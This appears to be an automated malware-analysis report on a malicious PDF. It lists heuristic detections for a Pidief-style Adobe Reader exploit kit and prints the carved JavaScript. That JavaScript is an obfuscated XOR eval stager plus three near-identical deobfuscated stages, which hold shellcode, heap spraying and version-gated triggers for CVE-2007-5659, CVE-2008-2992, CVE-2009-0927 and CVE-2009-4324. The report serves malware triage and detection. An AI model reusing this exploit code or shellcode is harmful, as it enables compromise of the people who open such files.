MALICIOUS
448
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, identified by the 'PDF_JAVASCRIPT' and 'PDF_JS' heuristics. The 'PDF_PAGE_WORD_XOR_EVAL_STAGER' heuristic indicates that this JavaScript is likely obfuscated and intended to execute arbitrary code. This pattern is commonly used to download and execute a second-stage payload. No specific family could be identified, and no external URLs were extracted.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 10
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGERPDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_000.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x10CE | 1158 bytes |
SHA-256: e9781769675fd658b6f031076b78a8286481b995746b95fd987aaa65b803345b |
|||
Preview scriptFirst 1,000 lines of the extracted script
var bOD={};t=24607;t-=114;oD=18853;oD-=112;var tM="une"+"sca"+"pe";try {} catch(kR){};var iR=new String("getPa"+"geNth"+"Word");var fY=new String();var dQ={yV:"p"};var jM=1;yF=["bIR"];hM=21646;hM++;hW=12106;hW-=249;var oB=new String("6pcgetP".substr(3)+"2rqageN".substr(3)+"4r3umWo".substr(3)+"fQ2rdsQ2f".substr(3,3));;var eB={sB:"zA"};this.bA='';iFG=17560;iFG++;var lM=String("char"+"Code"+"AtlGpV".substr(0,2));var pA=new Array();try {} catch(lY){};var qJ=new String("OMlfrom".substr(3)+"Char"+"HirCodeHir".substr(3,4));uH={f:false};var fG=String;try {} catch(n){};try {var d='mZ'} catch(d){};var sF=30;var vU=["p","a","","p"];yL=new String(vU[1]+vU[0]+vU[0]+vU[2]);var dI=["v","e","a","","l"];cPO=new String(dI[1]+dI[0]+dI[2]+dI[4]+dI[3]);var uHK=6445-6444;var wJ=6865-6863;var jMF=String("%");;var fI=String("sub"+"strHQ2C".substr(0,3));var qZ=694672-694672;function fW(kX,pU,uV,vC,gZG){return kX^pU;};var cD=this;var tC=new String();var yL=cD[yL];var wF=cD[tM];var rQ=cD[oB](jM);var qZO=cD[cPO];;for(var qB=qZ;qB<rQ;qB+=uHK){fK=cD[iR](jM,qB);var wJG=fK[fI](fK.length-wJ,wJ);var gV=wF(jMF+wJG);var vK=gV[lM](qZ);var qR=fW(vK,sF);tC+=fG[qJ](qR);}qZO(tC);
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 3770 bytes |
SHA-256: b177d40648cd8fdfec98556d31061c725a6a0d47eeb0558e48645ee70911b52a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%';
var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5=';
var hwTl9Dn = new Array();
function get_shellcode(name) {
var u = get_url();
u = for_unescape(u);
var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
s+= u;
return unescape(s);
}
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
function encode_str(str, src_table, dest_table){
var ret="";
for(var i=0; i < str.length; i++)
{
var index = src_table.indexOf(str[i]);
if(index > -1 )
{
ret += dest_table[index];
}
}
return ret;
};
function for_unescape(str)
{
var out = "";
str = bin2hex(str);
g = Math.round(str.length / 4);
if (g != str.length /4) str+="00";
for(var i=0; i < str.length; i+=4)
{
out+="%u" + str.substr(i+2, 2) + str.substr(i, 2);
}
return out;
}
function bin2hex (s){
var i, f = 0, a = [];
s += '';
f = s.length;
for (i = 0; i<f; i++) {
a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();
}
return a.join('');
}
function Rq4v1qCC(PDrScZj4, ez5pL6){
while (PDrScZj4.length * 2 < ez5pL6){
PDrScZj4 += PDrScZj4;
}
PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4;
}
function x8EvTm(I7T0vko5){
var qPBt7D = 0x0c0c0c0c;
NRjjR6W6 = get_shellcode("pdf");
if (I7T0vko5 == 1){qPBt7D = 0x30303030;}
var FeQq1Vv = 0x400000;
var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);
var PDrScZj4 = unescape("%u9090%u9090");
PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);
var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;
for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){
hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;
}
}
function U2UcYKr(){
var IyIFVe = app.viewerVersion.toString();
if (IyIFVe > 8)
{
x8EvTm(1);
var iVvCdy8 = "12999999999999999999";
for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ )
{
iVvCdy8 += "8";
}
util.printf("%45000f", iVvCdy8);
}
if (IyIFVe < 8){
x8EvTm(0);
var UNXaCTHb = unescape("%u0c0c%u0c0c");
while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;
this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb});
}
if (IyIFVe < 9.1){
if (app.doc.Collab.getIcon)
{
x8EvTm(0);
var eGREUTNw = unescape("%09");
while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;
eGREUTNw = "N." + eGREUTNw;
app.doc.Collab.getIcon(eGREUTNw);
}
}
if (IyIFVe == 9.2){
x8EvTm(1);
var sf="1.000000000.000000000.1337 : 3.13.37";
util.printd(sf, new Date());
try {
media.newPlayer(null);
} catch(e) {}
util.printd(sf, new Date());
}
}
U2UcYKr();
--�-#--� � ��� w�_
|
|||
legacy_pdfkit_stage_001.js |
deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 3764 bytes |
SHA-256: dbf0c45c33089ff48280854a0a3bc4b4d9dc944939f8fc36e4bfcb756c813e29 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
��
var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%';
var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5=';
var hwTl9Dn = new Array();
function get_shellcode(name) {
var u = get_url();
u = for_unescape(u);
var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
s+= u;
return unescape(s);
}
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
function encode_str(str, src_table, dest_table){
var ret="";
for(var i=0; i < str.length; i++)
{
var index = src_table.indexOf(str[i]);
if(index > -1 )
{
ret += dest_table[index];
}
}
return ret;
};
function for_unescape(str)
{
var out = "";
str = bin2hex(str);
g = Math.round(str.length / 4);
if (g != str.length /4) str+="00";
for(var i=0; i < str.length; i+=4)
{
out+="%u" + str.substr(i+2, 2) + str.substr(i, 2);
}
return out;
}
function bin2hex (s){
var i, f = 0, a = [];
s += '';
f = s.length;
for (i = 0; i<f; i++) {
a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();
}
return a.join('');
}
function Rq4v1qCC(PDrScZj4, ez5pL6){
while (PDrScZj4.length * 2 < ez5pL6){
PDrScZj4 += PDrScZj4;
}
PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4;
}
function x8EvTm(I7T0vko5){
var qPBt7D = 0x0c0c0c0c;
NRjjR6W6 = get_shellcode("pdf");
if (I7T0vko5 == 1){qPBt7D = 0x30303030;}
var FeQq1Vv = 0x400000;
var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);
var PDrScZj4 = unescape("%u9090%u9090");
PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);
var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;
for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){
hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;
}
}
function U2UcYKr(){
var IyIFVe = app.viewerVersion.toString();
if (IyIFVe > 8)
{
x8EvTm(1);
var iVvCdy8 = "12999999999999999999";
for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ )
{
iVvCdy8 += "8";
}
util.printf("%45000f", iVvCdy8);
}
if (IyIFVe < 8){
x8EvTm(0);
var UNXaCTHb = unescape("%u0c0c%u0c0c");
while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;
this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb});
}
if (IyIFVe < 9.1){
if (app.doc.Collab.getIcon)
{
x8EvTm(0);
var eGREUTNw = unescape("%09");
while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;
eGREUTNw = "N." + eGREUTNw;
app.doc.Collab.getIcon(eGREUTNw);
}
}
if (IyIFVe == 9.2){
x8EvTm(1);
var sf="1.000000000.000000000.1337 : 3.13.37";
util.printd(sf, new Date());
try {
media.newPlayer(null);
} catch(e) {}
util.printd(sf, new Date());
}
}
U2UcYKr();
���������_�
|
|||
page_word_xor_stage_000.js |
deobfuscated-js | page-word hex-tail XOR decoded JavaScript (decompressed, key=0x1E) at offset 0x28E | 3748 bytes |
SHA-256: a445cdd271a5876a108c718eff02e2295b7a8d9b0f54d87c279e4b9e9ba40d30 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%';
var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5=';
var hwTl9Dn = new Array();
function get_shellcode(name) {
var u = get_url();
u = for_unescape(u);
var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
s+= u;
return unescape(s);
}
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
function encode_str(str, src_table, dest_table){
var ret="";
for(var i=0; i < str.length; i++)
{
var index = src_table.indexOf(str[i]);
if(index > -1 )
{
ret += dest_table[index];
}
}
return ret;
};
function for_unescape(str)
{
var out = "";
str = bin2hex(str);
g = Math.round(str.length / 4);
if (g != str.length /4) str+="00";
for(var i=0; i < str.length; i+=4)
{
out+="%u" + str.substr(i+2, 2) + str.substr(i, 2);
}
return out;
}
function bin2hex (s){
var i, f = 0, a = [];
s += '';
f = s.length;
for (i = 0; i<f; i++) {
a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();
}
return a.join('');
}
function Rq4v1qCC(PDrScZj4, ez5pL6){
while (PDrScZj4.length * 2 < ez5pL6){
PDrScZj4 += PDrScZj4;
}
PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4;
}
function x8EvTm(I7T0vko5){
var qPBt7D = 0x0c0c0c0c;
NRjjR6W6 = get_shellcode("pdf");
if (I7T0vko5 == 1){qPBt7D = 0x30303030;}
var FeQq1Vv = 0x400000;
var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);
var PDrScZj4 = unescape("%u9090%u9090");
PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);
var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;
for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){
hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;
}
}
function U2UcYKr(){
var IyIFVe = app.viewerVersion.toString();
if (IyIFVe > 8)
{
x8EvTm(1);
var iVvCdy8 = "12999999999999999999";
for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ )
{
iVvCdy8 += "8";
}
util.printf("%45000f", iVvCdy8);
}
if (IyIFVe < 8){
x8EvTm(0);
var UNXaCTHb = unescape("%u0c0c%u0c0c");
while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;
this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb});
}
if (IyIFVe < 9.1){
if (app.doc.Collab.getIcon)
{
x8EvTm(0);
var eGREUTNw = unescape("%09");
while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;
eGREUTNw = "N." + eGREUTNw;
app.doc.Collab.getIcon(eGREUTNw);
}
}
if (IyIFVe == 9.2){
x8EvTm(1);
var sf="1.000000000.000000000.1337 : 3.13.37";
util.printd(sf, new Date());
try {
media.newPlayer(null);
} catch(e) {}
util.printd(sf, new Date());
}
}
U2UcYKr();
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.